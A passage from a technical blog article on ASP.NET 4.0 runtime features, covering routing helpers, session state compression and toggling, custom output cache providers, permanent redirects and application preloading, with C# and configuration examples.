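                // MapPageRoute() supplies the IRouteHandler internally.
                RouteTable.Routes.MapPageRoute("users", "users/{userId}", "~/UserDetail.aspx");
            }
        }

        // Code-behind of the hypothetical target page.
        public class UserDetail : System.Web.UI.Page
        {
            protected void Page_Load(object sender, EventArgs e)
            {
                // Reads the {userId} segment captured by the route.
                string userId = (string)this.RouteData.Values["userId"];
            }
        }

    Because MapPageRoute() provides the route handler internally, this is all that's needed for Page-based routing.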
    The Page class also has a GetRouteUrl() method that you can use to create URLs from route data values rather than hardcoding the URL:

        <%= this.GetRouteUrl("users", new { userId = "ricks" }) %>

    You can also use the new <%$ RouteUrl %> expression syntax to accomplish something similar, which can be easier to embed into Page or MVC View code:

        <a runat="server" href='<%$RouteUrl:RouteName=user, id=ricks %>'>Visit User</a>

    Finally, the Response object includes a new RedirectToRoute() method to build a route URL for redirection without hardcoding it:

        Response.RedirectToRoute("users", new { userId = "ricks" });

    All of these routines are helpers that have been integrated into the core ASP.NET engine to make it easier to create routes and retrieve route data, which hopefully will result in more people taking advantage of routing in ASP.NET. To find out more about the routing improvements, check out Dan Maharry's blog, which has a couple of nice entries on this subject: http://tinyurl.com/37trutj and http://tinyurl.com/39tt5w5.

    Session State Improvements

    Session state is an often used and abused feature in ASP.NET, and version 4.0 introduces a few enhancements geared towards making session state more efficient and minimizing at least some of the ill effects of overuse. The first improvement affects out-of-process session state, which is typically used in web farm environments or for sites that store application-sensitive data that must survive AppDomain restarts (which in my opinion is just about any application). When using out-of-process session state, ASP.NET serializes all the data in the session state bag into a blob that gets carried over the network and stored either in the State Server or in SQL Server via the session provider. Version 4.0 improves this serialization of the session data by offering a compressionEnabled attribute on the web.config <sessionState> section, which forces the serialized session state to be compressed. Depending on the type of data being serialized, this compression can reduce the size of the data travelling over the wire by as much as a third. It works best on string data, but can also reduce the size of binary data.

    In addition, ASP.NET 4.0 now offers a way to programmatically turn session state on or off as part of request processing. In prior versions, the only way to specify whether session state is available was by implementing a marker interface on the HTTP handler implementation. In ASP.NET 4.0, you can turn session state on and off programmatically via HttpContext.Current.SetSessionStateBehavior() as part of the ASP.NET module pipeline, as long as the call occurs before the AcquireRequestState pipeline event.
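    To make the programmatic switch concrete, here's a minimal sketch of an HTTP module that disables session state for requests under a hypothetical /static/ path; the module name and path rule are illustrative only. The key point is that the call happens at BeginRequest, safely before AcquireRequestState:

        using System;
        using System.Web;
        using System.Web.SessionState;

        public class SessionTogglerModule : IHttpModule
        {
            public void Init(HttpApplication app)
            {
                // BeginRequest fires well before AcquireRequestState,
                // so it's a safe place to change the behavior.
                app.BeginRequest += (sender, e) =>
                {
                    var context = ((HttpApplication)sender).Context;
                    // Hypothetical rule: no session for static content.
                    if (context.Request.Path.StartsWith("/static/", StringComparison.OrdinalIgnoreCase))
                        context.SetSessionStateBehavior(SessionStateBehavior.Disabled);
                };
            }

            public void Dispose() { }
        }

    The same call with SessionStateBehavior.ReadOnly is a cheap way to avoid exclusive session locking on requests that only read session data.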
    Output Cache Provider

    Output caching in ASP.NET has been a very useful but potentially memory-intensive feature. The default OutputCache mechanism works through in-memory storage that persists generated output based on various lifetime-related parameters. While this works well enough for many intended scenarios, it can also quickly cause runaway memory consumption as the cache fills up and serves many variations of pages on your site. ASP.NET 4.0 introduces a provider model for the OutputCache module, so it becomes possible to plug in custom storage strategies for cached pages (a minimal provider sketch appears below, after the preloading discussion). One of the goals also appears to be to consolidate some of the different cache storage mechanisms used in .NET into a generic Windows AppFabric framework in the future, so that various mechanisms like OutputCache, the non-Page-specific ASP.NET Cache, and possibly even session state can eventually use the same caching engine for storage of persisted data, both in memory and in out-of-process scenarios. For developers, the OutputCache provider feature means that you can now extend caching on your own by implementing a custom cache provider based on the System.Web.Caching.OutputCacheProvider class. You can find more info on creating an Output Cache provider in Gunnar Peipman's blog at: http://tinyurl.com/2vt6g7l.

    Response.RedirectPermanent

    ASP.NET 4.0 includes the ability to issue a permanent redirect as an HTTP 301 Moved Permanently response rather than the standard 302 Found response. In pre-4.0 versions you had to build your permanent redirect manually by setting the Status and StatusCode properties; Response.RedirectPermanent() makes this operation more obvious and discoverable. There's also a Response.RedirectToRoutePermanent() which provides permanent redirection for route URLs.

    Preloading of Applications

    ASP.NET 4.0 provides a new feature to preload ASP.NET applications on startup, which is meant to provide a more consistent startup experience. If your application has a lengthy startup cycle, it can appear very slow to serve data to clients while it is warming up and loading initial resources. So rather than serve these startup requests slowly, ASP.NET 4.0 can force the application to initialize itself before accepting requests for processing. This feature works only on IIS 7.5 (Windows 7 and Windows Server 2008 R2). You can set up a worker process in IIS 7.5 to always be running, which starts the Application Pool worker process immediately. ASP.NET 4.0 then allows you to specify site-specific settings by setting serviceAutoStartEnabled on a particular site, along with an optional serviceAutoStartProvider class that can be used to receive "startup events" when the application starts up. This event in turn can be used to configure the application and optionally pre-load cache data and other information required by the app on startup. The configuration settings need to be made in applicationhost.config:

        <sites>
          <site name="WebApplication2" id="1">
            <application path="/"
                         serviceAutoStartEnabled="true"
                         serviceAutoStartProvider="PreWarmup" />
          </site>
        </sites>
        <serviceAutoStartProviders>
          <add name="PreWarmup" type="PreWarmupProvider,MyAssembly" />
        </serviceAutoStartProviders>

    Hooking up a warm-up provider is optional, so you can omit the provider definition and reference. If you do define one, here's what it looks like:

        public class PreWarmupProvider : System.Web.Hosting.IProcessHostPreloadClient
        {
            public void Preload(string[] parameters)
            {
                // initialization for app
            }
        }

    While this code runs, ASP.NET/IIS holds requests back from the pipeline, so the application will not start taking requests until it completes. The idea is that you can perform any pre-loading of resources and cache values so that the first request is ready to perform at an optimal level without lag.
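    Circling back to the output cache provider model described above, here's a minimal sketch of a custom provider. The class name and the naive in-memory dictionary store are purely illustrative; a real provider would honor utcExpiry and would typically write to out-of-process storage such as disk or a distributed cache:

        using System;
        using System.Collections.Concurrent;
        using System.Web.Caching;

        // Sketch of a custom output cache provider; ignores expiration
        // for brevity, which a real implementation must not do.
        public class DictionaryOutputCacheProvider : OutputCacheProvider
        {
            private static readonly ConcurrentDictionary<string, object> _store =
                new ConcurrentDictionary<string, object>();

            public override object Get(string key)
            {
                object entry;
                _store.TryGetValue(key, out entry);
                return entry;
            }

            public override object Add(string key, object entry, DateTime utcExpiry)
            {
                // Add must return the existing entry if one is already cached.
                return _store.GetOrAdd(key, entry);
            }

            public override void Set(string key, object entry, DateTime utcExpiry)
            {
                _store[key] = entry;
            }

            public override void Remove(string key)
            {
                object removed;
                _store.TryRemove(key, out removed);
            }
        }

    A provider like this is then registered in the providers collection of the <caching><outputCache> section in web.config and selected via the defaultProvider attribute.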
    Runtime Performance Improvements

    According to Microsoft, there have also been a number of invisible performance improvements in the internals of the ASP.NET runtime that should make ASP.NET 4.0 applications run more efficiently and use fewer resources. These features require no changes in applications and are virtually transparent: you get the benefits simply by updating to ASP.NET 4.0.

    Summary

    The core feature set changes are minimal, which continues a tradition of small incremental changes to the ASP.NET runtime. ASP.NET has been proven as a solid platform, and I'm actually rather happy to see that most of the effort in this release went into stability, performance, and usability improvements rather than a massive amount of new features. The new functionality added in 4.0 is minimal but very useful. A lot of people are still running pure .NET 2.0 applications these days and have stayed off .NET 3.5 for some time now. I think that version 4.0, with its full .NET runtime rev and its assembly and configuration consolidation, will make an attractive platform for developers to update to. If you're a Web Forms developer in particular, ASP.NET 4.0 includes a host of new features in the Web Forms engine that are significant enough to warrant a quick move to .NET 4.0. I'll cover those changes in my next column. Until then, I suggest you give ASP.NET 4.0 a spin and see for yourself how the new features can help you out.

    © Rick Strahl, West Wind Technologies, 2005-2010. Posted in ASP.NET

    Read the article
